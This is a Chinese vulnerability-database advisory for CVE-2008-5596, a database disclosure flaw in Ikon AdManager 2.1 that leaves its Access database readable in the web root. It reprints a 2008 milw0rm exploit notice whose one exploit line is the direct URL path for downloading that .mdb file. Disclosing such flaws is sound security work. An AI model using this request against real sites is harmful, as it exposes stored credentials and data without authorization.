投稿
https://www.exploit-db.com/exploits/7372
https://www.securityfocus.com/bid/84648
https://cxsecurity.com/issue/WLB-2008120149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-281
Ikon AdManager ikonBAnner_AdManager.mdb敏感信息泄漏漏洞
| 漏洞ID | 1116963 | 漏洞类型 | 权限许可和访问控制 |
| 发布时间 | 2008-12-07 | 更新时间 | 2008-12-16 |
 CVE编号
|
CVE-2008-5596 |  CNNVD-ID
|
CNNVD-200812-281 |
| 漏洞平台 | ASP | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
IkonAdManager是一款功能强大的广告和横幅管理工具。IkonAdManager2.1及其早期版本在WEB根目录下储存敏感信息并未给予足够的访问控制,这会允许远程攻击者可以借助向ikonBAnner_AdManager.mdb提交一个直接的请求,下载数据库文件。
|漏洞EXP
####################################################################################################
# Ikon AdManager 2.1 (ikonBAnner_AdManager.mdb) Database Disclosure Vulnerability #
# © Ghost Hacker - REAL-H.COM #
####################################################################################################
#[~] Author : Ghost Hacker #
#[~] Homepage : http://Real-h.com #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com #
#[~] Bug : Database Disclosure #
#[~] Name Script : Ikon AdManager 2.1 #
#[~] Download : http://www.dotnetindex.com/downloads/easy_download_getinfo.asp?id=7 #
####################################################################################################
#[~]Exploit #
# http://xxxx.com/[path]/database/ikonBAnner_AdManager.mdb #
################# ###################################################################################
#[~]Greets : #
# Mr.SaFa7 [v4-team.com] , All Members Real-h.com and v4-team.net , All My Friends (3ed mobark) #
####################################################################################################
# milw0rm.com [2008-12-07]|受影响的产品
dotnetindex Ikon Admanager 2.1
|参考资料
来源:MILW0RM
名称:7372
链接:http://www.milw0rm.com/exploits/7372
来源:SREASON
名称:4755
链接:http://securityreason.com/securityalert/4755
来源:SECUNIA
名称:33029
链接:http://secunia.com/advisories/33029
检索漏洞
开始时间
结束时间